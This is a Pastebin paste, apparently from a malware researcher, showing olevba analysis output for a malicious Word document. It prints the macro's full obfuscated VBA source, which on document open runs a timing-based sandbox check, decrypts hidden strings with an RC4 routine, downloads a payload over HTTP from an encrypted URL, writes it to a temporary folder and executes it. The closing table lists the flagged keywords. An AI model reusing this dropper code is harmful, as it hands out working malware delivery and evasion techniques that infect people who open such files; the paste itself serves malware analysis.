API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Aug 26th, 2015
651
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 14.71 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OpX:MAS-HB- janet_~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: janet_~1.doc
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Option Explicit
  16. Function BisGh2qsZSaI4i(ByVal CLCVsW3yt As String, ByVal MzaOxGYPFT2yo As String) As String
  17. Dim Aw3OJyAlDvIYq As Long, MyTy6oIsTsb As Long
  18. Aw3OJyAlDvIYq = 78
  19. MyTy6oIsTsb = 40
  20. If Aw3OJyAlDvIYq + MyTy6oIsTsb > 2 Then
  21. MyTy6oIsTsb = Aw3OJyAlDvIYq + 57
  22. Else
  23. MsgBox 58
  24. End If
  25. On Error Resume Next
  26. Dim TjaNtxNNlIKKEG As Long, YZclLkYn7p2 As Long
  27. TjaNtxNNlIKKEG = 59
  28. YZclLkYn7p2 = 72
  29. If TjaNtxNNlIKKEG + YZclLkYn7p2 > 2 Then
  30. YZclLkYn7p2 = TjaNtxNNlIKKEG + 31
  31. Else
  32. MsgBox 82
  33. End If
  34. Dim X8v8JUH(0 To 255) As Integer, VDZV As Long, SBH7gOqEuH5HdgI As Long, Lgt0NOscKr0 As Long, S55EXOjWN3SP() As Byte, JqKtbyGKDngm7OAiU() As Byte, WdrrAxUSElWZCt As Byte
  35. Dim Ev7jk1yNz As Long, Sth8xy9YZxuSVTi As Long
  36. Ev7jk1yNz = 49
  37. Sth8xy9YZxuSVTi = 80
  38. If Ev7jk1yNz + Sth8xy9YZxuSVTi > 2 Then
  39. Sth8xy9YZxuSVTi = Ev7jk1yNz + 61
  40. Else
  41. MsgBox 66
  42. End If
  43. S55EXOjWN3SP() = StrConv(MzaOxGYPFT2yo, vbFromUnicode)
  44. Dim QpqcYrl226fM7 As Long, OKg928ht As Long
  45. QpqcYrl226fM7 = 69
  46. OKg928ht = 19
  47. If QpqcYrl226fM7 + OKg928ht > 2 Then
  48. OKg928ht = QpqcYrl226fM7 + 19
  49. Else
  50. MsgBox 71
  51. End If
  52. For VDZV = 0 To 255
  53. X8v8JUH(VDZV) = VDZV
  54. Next VDZV
  55. VDZV = 0
  56. SBH7gOqEuH5HdgI = 0
  57. Lgt0NOscKr0 = 0
  58. For VDZV = 0 To 255
  59. SBH7gOqEuH5HdgI = (SBH7gOqEuH5HdgI + X8v8JUH(VDZV) + S55EXOjWN3SP(VDZV Mod Len(MzaOxGYPFT2yo))) Mod 256
  60. WdrrAxUSElWZCt = X8v8JUH(VDZV)
  61. X8v8JUH(VDZV) = X8v8JUH(SBH7gOqEuH5HdgI)
  62. X8v8JUH(SBH7gOqEuH5HdgI) = WdrrAxUSElWZCt
  63. Next VDZV
  64. VDZV = 0
  65. SBH7gOqEuH5HdgI = 0
  66. Lgt0NOscKr0 = 0
  67. JqKtbyGKDngm7OAiU() = StrConv(CLCVsW3yt, vbFromUnicode)
  68. For VDZV = 0 To Len(CLCVsW3yt)
  69. SBH7gOqEuH5HdgI = (SBH7gOqEuH5HdgI + 1) Mod 256
  70. Lgt0NOscKr0 = (Lgt0NOscKr0 + X8v8JUH(SBH7gOqEuH5HdgI)) Mod 256
  71. WdrrAxUSElWZCt = X8v8JUH(SBH7gOqEuH5HdgI)
  72. X8v8JUH(SBH7gOqEuH5HdgI) = X8v8JUH(Lgt0NOscKr0)
  73. X8v8JUH(Lgt0NOscKr0) = WdrrAxUSElWZCt
  74. JqKtbyGKDngm7OAiU(VDZV) = JqKtbyGKDngm7OAiU(VDZV) Xor (X8v8JUH((X8v8JUH(SBH7gOqEuH5HdgI) + X8v8JUH(Lgt0NOscKr0)) Mod 256))
  75. Next VDZV
  76. Dim CIwwyCggT7nn As Long, IkcY8UId2VHs As Long
  77. CIwwyCggT7nn = 56
  78. IkcY8UId2VHs = 59
  79. If CIwwyCggT7nn + IkcY8UId2VHs > 2 Then
  80. IkcY8UId2VHs = CIwwyCggT7nn + 77
  81. Else
  82. MsgBox 95
  83. End If
  84. BisGh2qsZSaI4i = StrConv(JqKtbyGKDngm7OAiU, vbUnicode)
  85. Dim Ey928ht As Long, DlOX6tGmePtLm As Long
  86. Ey928ht = 57
  87. DlOX6tGmePtLm = 2
  88. If Ey928ht + DlOX6tGmePtLm > 2 Then
  89. DlOX6tGmePtLm = Ey928ht + 70
  90. Else
  91. MsgBox 90
  92. End If
  93. End Function
  94. Function C0SFQS3rcm1O() As String
  95. Dim QGeVs6pkqomFqUzC As Long, XJ2vS1mIjFw As Long
  96. QGeVs6pkqomFqUzC = 77
  97. XJ2vS1mIjFw = 40
  98. If QGeVs6pkqomFqUzC + XJ2vS1mIjFw > 2 Then
  99. XJ2vS1mIjFw = QGeVs6pkqomFqUzC + 79
  100. Else
  101. MsgBox 89
  102. End If
  103. Dim IkOqnKKePv() As Byte, W5ZCirTxDiID() As Byte, KEhMxCpW As Long, PJmv5HFiQVJG As Long, Qsm48HB9isGh2qsZS As String, Kg9jxEn7KgKAR As String, EIM As Long
  104. Dim XVlEwdbHQZc9 As Long, Nah As Long
  105. XVlEwdbHQZc9 = 66
  106. Nah = 75
  107. If XVlEwdbHQZc9 + Nah > 2 Then
  108. Nah = XVlEwdbHQZc9 + 47
  109. Else
  110. MsgBox 60
  111. End If
  112. EIM = 0
  113. Dim AzXAblWSIFbZ As Long, GotofXNR As Long
  114. AzXAblWSIFbZ = 24
  115. GotofXNR = 27
  116. If AzXAblWSIFbZ + GotofXNR > 2 Then
  117. GotofXNR = AzXAblWSIFbZ + 45
  118. Else
  119. MsgBox 90
  120. End If
  121. YT0ph65PeZL5eil:
  122. Dim JaYPh As Long, PgJTFpK5Nedf As Long
  123. JaYPh = 82
  124. PgJTFpK5Nedf = 6
  125. If JaYPh + PgJTFpK5Nedf > 2 Then
  126. PgJTFpK5Nedf = JaYPh + 34
  127. Else
  128. MsgBox 97
  129. End If
  130. Randomize
  131. Kg9jxEn7KgKAR = Int(30 * Rnd)
  132. If Kg9jxEn7KgKAR < 4 Then GoTo YT0ph65PeZL5eil
  133. EIM = Kg9jxEn7KgKAR
  134. If EIM > 0& Then
  135. Dim Y5OpqZvRWPgnay1r As Long, XZnzXAblWSI As Long
  136. Y5OpqZvRWPgnay1r = 1
  137. XZnzXAblWSI = 50
  138. If Y5OpqZvRWPgnay1r + XZnzXAblWSI > 2 Then
  139. XZnzXAblWSI = Y5OpqZvRWPgnay1r + 50
  140. Else
  141. MsgBox 3
  142. End If
  143. Qsm48HB9isGh2qsZS = BisGh2qsZSaI4i(HC4Eh("007B6E66BF9A5183A73C"), "O8yKbvLXKLok4D")
  144. Randomize
  145. IkOqnKKePv = Qsm48HB9isGh2qsZS
  146. KEhMxCpW = Len(Qsm48HB9isGh2qsZS) - 1&
  147. EIM = (EIM * 2&) - 1&
  148. ReDim W5ZCirTxDiID(EIM) As Byte
  149. Dim Gux1bV As Long, LonguECPh As Long
  150. Gux1bV = 82
  151. LonguECPh = 52
  152. If Gux1bV + LonguECPh > 2 Then
  153. LonguECPh = Gux1bV + 43
  154. Else
  155. MsgBox 22
  156. End If
  157. For PJmv5HFiQVJG = 0& To EIM Step 2&
  158. W5ZCirTxDiID(PJmv5HFiQVJG) = IkOqnKKePv(CLng(KEhMxCpW * Rnd) * 2&)
  159. Next
  160. Dim RLK5wSqSooX As Long, Q3k6D3KgMJxA2A2 As Long
  161. RLK5wSqSooX = 87
  162. Q3k6D3KgMJxA2A2 = 90
  163. If RLK5wSqSooX + Q3k6D3KgMJxA2A2 > 2 Then
  164. Q3k6D3KgMJxA2A2 = RLK5wSqSooX + 9
  165. Else
  166. MsgBox 27
  167. End If
  168. End If
  169. Dim Kiv1eQnKgMJxA2A2 As Long, VnupQRCjB As Long
  170. Kiv1eQnKgMJxA2A2 = 45
  171. VnupQRCjB = 62
  172. If Kiv1eQnKgMJxA2A2 + VnupQRCjB > 2 Then
  173. VnupQRCjB = Kiv1eQnKgMJxA2A2 + 64
  174. Else
  175. MsgBox 60
  176. End If
  177. C0SFQS3rcm1O = W5ZCirTxDiID
  178. Dim WFBGT5OKR As Long, Iamv9aQEjfVY As Long
  179. WFBGT5OKR = 17
  180. Iamv9aQEjfVY = 49
  181. If WFBGT5OKR + Iamv9aQEjfVY > 2 Then
  182. Iamv9aQEjfVY = WFBGT5OKR + 77
  183. Else
  184. MsgBox 19
  185. End If
  186. End Function
  187. Sub VVPFG1308C2spDIWn(RtRw0 As Long)
  188. Dim FgBKi1HzznODsi As Long, Sx1bVnupQ As Long
  189. FgBKi1HzznODsi = 29
  190. Sx1bVnupQ = 39
  191. If FgBKi1HzznODsi + Sx1bVnupQ > 2 Then
  192. Sx1bVnupQ = FgBKi1HzznODsi + 10
  193. Else
  194. MsgBox 96
  195. End If
  196. Dim BubaBeerHmG5Yai As Long
  197. Dim XFz9iPa As Long, Hgn2dId6 As Long
  198. XFz9iPa = 8
  199. Hgn2dId6 = 53
  200. If XFz9iPa + Hgn2dId6 > 2 Then
  201. Hgn2dId6 = XFz9iPa + 65
  202. Else
  203. MsgBox 79
  204. End If
  205. BubaBeerHmG5Yai = Timer + RtRw0
  206. Do While Timer < BubaBeerHmG5Yai
  207. DoEvents
  208. Loop
  209. Dim X3GpAHbh As Long, LSSA55sOa As Long
  210. X3GpAHbh = 28
  211. LSSA55sOa = 91
  212. If X3GpAHbh + LSSA55sOa > 2 Then
  213. LSSA55sOa = X3GpAHbh + 48
  214. Else
  215. MsgBox 78
  216. End If
  217. End Sub
  218. Sub Document_Open()
  219. Dim IgZu87nNEETIb0jy As Long, ABk2pCGcv5mul As Long
  220. IgZu87nNEETIb0jy = 72
  221. ABk2pCGcv5mul = 60
  222. If IgZu87nNEETIb0jy + ABk2pCGcv5mul > 2 Then
  223. ABk2pCGcv5mul = IgZu87nNEETIb0jy + 95
  224. Else
  225. MsgBox 89
  226. End If
  227. Dim MAS5R3C4xPbd As Long, IoPomHjvlGg As Long, XTgiXBJhRsNOxn As Long
  228. Dim FSE2FuWYk28 As Long, K6rIFQhggSk As Long
  229. FSE2FuWYk28 = 9
  230. K6rIFQhggSk = 97
  231. If FSE2FuWYk28 + K6rIFQhggSk > 2 Then
  232. K6rIFQhggSk = FSE2FuWYk28 + 32
  233. Else
  234. MsgBox 27
  235. End If
  236. MAS5R3C4xPbd = 989218552: IoPomHjvlGg = 0: XTgiXBJhRsNOxn = 0
  237. Dim Yb6W6D4sT3x As Long, DWnGEfxAXwjAIL As Long
  238. Yb6W6D4sT3x = 49
  239. DWnGEfxAXwjAIL = 3
  240. If Yb6W6D4sT3x + DWnGEfxAXwjAIL > 2 Then
  241. DWnGEfxAXwjAIL = Yb6W6D4sT3x + 41
  242. Else
  243. MsgBox 1
  244. End If
  245. For IoPomHjvlGg = 1 To MAS5R3C4xPbd
  246. XTgiXBJhRsNOxn = XTgiXBJhRsNOxn + 1
  247. Next IoPomHjvlGg
  248. Dim Cgt1IgIo7tTK1 As Long, SDERiA9zLtxK As Long
  249. Cgt1IgIo7tTK1 = 57
  250. SDERiA9zLtxK = 77
  251. If Cgt1IgIo7tTK1 + SDERiA9zLtxK > 2 Then
  252. SDERiA9zLtxK = Cgt1IgIo7tTK1 + 44
  253. Else
  254. MsgBox 44
  255. End If
  256. If XTgiXBJhRsNOxn = MAS5R3C4xPbd Then
  257. Dim Gko0yKjP As Long, M89edfLoAL4 As Long
  258. Gko0yKjP = 35
  259. M89edfLoAL4 = 45
  260. If Gko0yKjP + M89edfLoAL4 > 2 Then
  261. M89edfLoAL4 = Gko0yKjP + 16
  262. Else
  263. MsgBox 3
  264. End If
  265. O8jUS6vnxz
  266. Dim IahFtJOsViR8hTKCW As Long, EiBSYiGOD4G As Long
  267. IahFtJOsViR8hTKCW = 84
  268. EiBSYiGOD4G = 22
  269. If IahFtJOsViR8hTKCW + EiBSYiGOD4G > 2 Then
  270. EiBSYiGOD4G = IahFtJOsViR8hTKCW + 11
  271. Else
  272. MsgBox 90
  273. End If
  274. Else
  275. Dim RffSSCRUQ As Long, CfnbRB As Long
  276. RffSSCRUQ = 39
  277. CfnbRB = 59
  278. If RffSSCRUQ + CfnbRB > 2 Then
  279. CfnbRB = RffSSCRUQ + 26
  280. Else
  281. MsgBox 25
  282. End If
  283. JIi6zJoXxJ4FUx
  284. Dim Xx9SKz55xm9xRTw9RYt As Long, DyDGRwZfB8KiEp0D As Long
  285. Xx9SKz55xm9xRTw9RYt = 89
  286. DyDGRwZfB8KiEp0D = 7
  287. If Xx9SKz55xm9xRTw9RYt + DyDGRwZfB8KiEp0D > 2 Then
  288. DyDGRwZfB8KiEp0D = Xx9SKz55xm9xRTw9RYt + 30
  289. Else
  290. MsgBox 84
  291. End If
  292. End If
  293. Dim Mevly2IQnZyFyL As Long, I8zuLOOSQ As Long
  294. Mevly2IQnZyFyL = 26
  295. I8zuLOOSQ = 25
  296. If Mevly2IQnZyFyL + I8zuLOOSQ > 2 Then
  297. I8zuLOOSQ = Mevly2IQnZyFyL + 1
  298. Else
  299. MsgBox 74
  300. End If
  301. End Sub
  302. Sub O8jUS6vnxz()
  303. Dim YD5dfzOx As Long, HgXJOd2EF As Long
  304. YD5dfzOx = 55
  305. HgXJOd2EF = 11
  306. If YD5dfzOx + HgXJOd2EF > 2 Then
  307. HgXJOd2EF = YD5dfzOx + 70
  308. Else
  309. MsgBox 39
  310. End If
  311. Dim TjWxlsut As String, UEntF As Object, BtkO As Integer
  312. Dim N2MOWdWwO0j As Long, MOBZvxC As Long
  313. N2MOWdWwO0j = 27
  314. MOBZvxC = 22
  315. If N2MOWdWwO0j + MOBZvxC > 2 Then
  316. MOBZvxC = N2MOWdWwO0j + 10
  317. Else
  318. MsgBox 45
  319. End If
  320. TjWxlsut = Environ(BisGh2qsZSaI4i(HC4Eh("F38BE554FBE8BA"), "SrO1U")) & "\" & C0SFQS3rcm1O & BisGh2qsZSaI4i(HC4Eh("65F4D01F"), "LGT80oH28G6azO")
  321. Dim XLiQIh As Long, EaGCChvXnXF As Long
  322. XLiQIh = 91
  323. EaGCChvXnXF = 25
  324. If XLiQIh + EaGCChvXnXF > 2 Then
  325. EaGCChvXnXF = XLiQIh + 98
  326. Else
  327. MsgBox 6
  328. End If
  329. Set UEntF = CreateObject(BisGh2qsZSaI4i(HC4Eh("3CA9F308CFC8C01DAE7825024F506AB2D433546C"), "XRSkY1Qu0EO7Io"))
  330. Dim Gc0u96uQAA62 As Long, Sbul0 As Long
  331. Gc0u96uQAA62 = 79
  332. Sbul0 = 15
  333. If Gc0u96uQAA62 + Sbul0 > 2 Then
  334. Sbul0 = Gc0u96uQAA62 + 82
  335. Else
  336. MsgBox 26
  337. End If
  338. UEntF.Open BisGh2qsZSaI4i(HC4Eh("ADF9E9"), "TJAVWNEr5wffS"), BisGh2qsZSaI4i(HC4Eh("2DDE020F7B5A22E13AA25B42980F6E15900272F5F4EA62C42BAD"), "Y9CsyAOl8HLyT0"), False
  339. Dim W7VeIIt5Ql0BstfILt5tgQkL As Long, WJExnuh49CcbbhJB As Long
  340. W7VeIIt5Ql0BstfILt5tgQkL = 63
  341. WJExnuh49CcbbhJB = 38
  342. If W7VeIIt5Ql0BstfILt5tgQkL + WJExnuh49CcbbhJB > 2 Then
  343. WJExnuh49CcbbhJB = W7VeIIt5Ql0BstfILt5tgQkL + 12
  344. Else
  345. MsgBox 64
  346. End If
  347. UEntF.setRequestHeader BisGh2qsZSaI4i(HC4Eh("3094D20C526AD8C4A42C"), "OKwIQnZyFyL"), BisGh2qsZSaI4i(HC4Eh("07031A21E79693635F4C2E"), "Ko1W3OxLfD9")
  348. UEntF.send
  349. If UEntF.Status = 200 Then
  350. Dim X9MV4QnJ As Long, Wxd1Z As Long
  351. X9MV4QnJ = 29
  352. Wxd1Z = 41
  353. If X9MV4QnJ + Wxd1Z > 2 Then
  354. Wxd1Z = X9MV4QnJ + 77
  355. Else
  356. MsgBox 93
  357. End If
  358. BtkO = FreeFile
  359. Open TjWxlsut For Binary Access Write Lock Write As #BtkO
  360. Put #BtkO, , BisGh2qsZSaI4i(StrConv(UEntF.ResponseBody, vbUnicode), BisGh2qsZSaI4i(HC4Eh("B31BB3295C8CEB02B4"), "LIKoQo"))
  361. Close #BtkO
  362. Dim NiXRELM3UpHAmFN As Long, TdQUv8NUmUNW As Long
  363. NiXRELM3UpHAmFN = 32
  364. TdQUv8NUmUNW = 31
  365. If NiXRELM3UpHAmFN + TdQUv8NUmUNW > 2 Then
  366. TdQUv8NUmUNW = NiXRELM3UpHAmFN + 7
  367. Else
  368. MsgBox 80
  369. End If
  370. VVPFG1308C2spDIWn 1
  371. Dim DhskpMx As Long, Ht4FYWcJVV As Long
  372. DhskpMx = 93
  373. Ht4FYWcJVV = 49
  374. If DhskpMx + Ht4FYWcJVV > 2 Then
  375. Ht4FYWcJVV = DhskpMx + 9
  376. Else
  377. MsgBox 78
  378. End If
  379. CreateObject(BisGh2qsZSaI4i(HC4Eh("72A35343258EBB027022F2EC9B"), "EKo0qpqY20IW")).Run """" & TjWxlsut & """"
  380. Dim GVHU As Long, PIPIlv As Long
  381. GVHU = 76
  382. PIPIlv = 76
  383. If GVHU + PIPIlv > 2 Then
  384. PIPIlv = GVHU + 29
  385. Else
  386. MsgBox 45
  387. End If
  388. End If
  389. Dim UG8inCV As Long, GvtUO0xjBrviph As Long
  390. UG8inCV = 86
  391. GvtUO0xjBrviph = 96
  392. If UG8inCV + GvtUO0xjBrviph > 2 Then
  393. GvtUO0xjBrviph = UG8inCV + 67
  394. Else
  395. MsgBox 54
  396. End If
  397. Set UEntF = Nothing
  398. Dim OoO7WgL3f6 As Long, W8UfMpFAk6r7wDmpd As Long
  399. OoO7WgL3f6 = 32
  400. W8UfMpFAk6r7wDmpd = 8
  401. If OoO7WgL3f6 + W8UfMpFAk6r7wDmpd > 2 Then
  402. W8UfMpFAk6r7wDmpd = OoO7WgL3f6 + 8
  403. Else
  404. MsgBox 60
  405. End If
  406. End Sub
  407. Sub JIi6zJoXxJ4FUx()
  408. Dim ILB4LXq As Long, VZOXHoYG As Long
  409. ILB4LXq = 29
  410. VZOXHoYG = 17
  411. If ILB4LXq + VZOXHoYG > 2 Then
  412. VZOXHoYG = ILB4LXq + 52
  413. Else
  414. MsgBox 47
  415. End If
  416. LOF 19
  417. If CDate(74) = True Then TObfXnLxh = 8210
  418. ChDir 29
  419. DateSerial 69, 95, 71
  420. GetSetting 45, 96, 40
  421. Iw8sFmuEJPo = EOF(38)
  422. L9q5ZQK4yXwj = CVErr(91)
  423. LoadPicture 56, 89, 62, 70, 20
  424. AppActivate 70
  425. DoEvents
  426. DateAdd "MRQ3g", 92, 80
  427. If CByte(16) = True Then G5byjhGK5 = 1054
  428. Loc 95
  429. TimeSerial 43, 28, 21
  430. TimeValue 43
  431. Switch 75
  432. GPM5Nqt6HX = LCase(4)
  433. Stop
  434. GetAllSettings 45, 22
  435. Hnx1mlVul5w = CurDir
  436. FV 40, 85, 75
  437. FreeFile 32
  438. Rate 35, 97, 37
  439. Year 47
  440. Partition 63, 42, 4, 21
  441. BzqIvVDfm = CStr(22)
  442. DeleteSetting "BFaaH0VR1HwM"
  443. If CBool(19) = True Then KlPRblWBjELLi = 28
  444. Month 72
  445. HZuGrM5 = QBColor(85)
  446. Dim V2ue4kzqbxbDiQ6PQ As Long, GJHeAk As Long
  447. V2ue4kzqbxbDiQ6PQ = 27
  448. GJHeAk = 51
  449. If V2ue4kzqbxbDiQ6PQ + GJHeAk > 2 Then
  450. GJHeAk = V2ue4kzqbxbDiQ6PQ + 5
  451. Else
  452. MsgBox 43
  453. End If
  454. End Sub
  455. Function HC4Eh(MMBN9ASIg As String) As String
  456. Dim Rxai9aZnaw As Long, OOObBva2nq As Long
  457. Rxai9aZnaw = 21
  458. OOObBva2nq = 94
  459. If Rxai9aZnaw + OOObBva2nq > 2 Then
  460. OOObBva2nq = Rxai9aZnaw + 47
  461. Else
  462. MsgBox 90
  463. End If
  464. Dim VbGuVpS0UMsm48HB9 As Integer
  465. Dim TK1L7otYaw9d4S As Long, YA3jZXjVOWURAe As Long
  466. TK1L7otYaw9d4S = 96
  467. YA3jZXjVOWURAe = 16
  468. If TK1L7otYaw9d4S + YA3jZXjVOWURAe > 2 Then
  469. YA3jZXjVOWURAe = TK1L7otYaw9d4S + 83
  470. Else
  471. MsgBox 82
  472. End If
  473. For VbGuVpS0UMsm48HB9 = 1 To Len(MMBN9ASIg) Step 2
  474. HC4Eh = HC4Eh & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(MMBN9ASIg, VbGuVpS0UMsm48HB9, 2)))
  475. Next
  476. Dim I5ABva2nq As Long, RKGUxUhZjOCfIz As Long
  477. I5ABva2nq = 66
  478. RKGUxUhZjOCfIz = 60
  479. If I5ABva2nq + RKGUxUhZjOCfIz > 2 Then
  480. RKGUxUhZjOCfIz = I5ABva2nq + 4
  481. Else
  482. MsgBox 46
  483. End If
  484. End Function
  485. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  486. ANALYSIS:
  487. +------------+----------------+-----------------------------------------+
  488. | Type       | Keyword        | Description                             |
  489. +------------+----------------+-----------------------------------------+
  490. | AutoExec   | Document_Open  | Runs when the Word document is opened   |
  491. | Suspicious | AppActivate    | May control another application by      |
  492. |            |                | simulating user keystrokes              |
  493. | Suspicious | CreateObject   | May create an OLE object                |
  494. | Suspicious | Open           | May open a file                         |
  495. | Suspicious | Run            | May run an executable file or a system  |
  496. |            |                | command                                 |
  497. | Suspicious | Environ        | May read system environment variables   |
  498. | Suspicious | Write          | May write to a file (if combined with   |
  499. |            |                | Open)                                   |
  500. | Suspicious | Put            | May write to a file (if combined with   |
  501. |            |                | Open)                                   |
  502. | Suspicious | Chr            | May attempt to obfuscate specific       |
  503. |            |                | strings                                 |
  504. | Suspicious | Xor            | May attempt to obfuscate specific       |
  505. |            |                | strings                                 |
  506. | Suspicious | Binary         | May read or write a binary file (if     |
  507. |            |                | combined with Open)                     |
  508. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  509. |            |                | be used to obfuscate strings (option    |
  510. |            |                | --decode to see all)                    |
  511. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  512. |            |                | may be used to obfuscate strings        |
  513. |            |                | (option --decode to see all)            |
  514. +------------+----------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!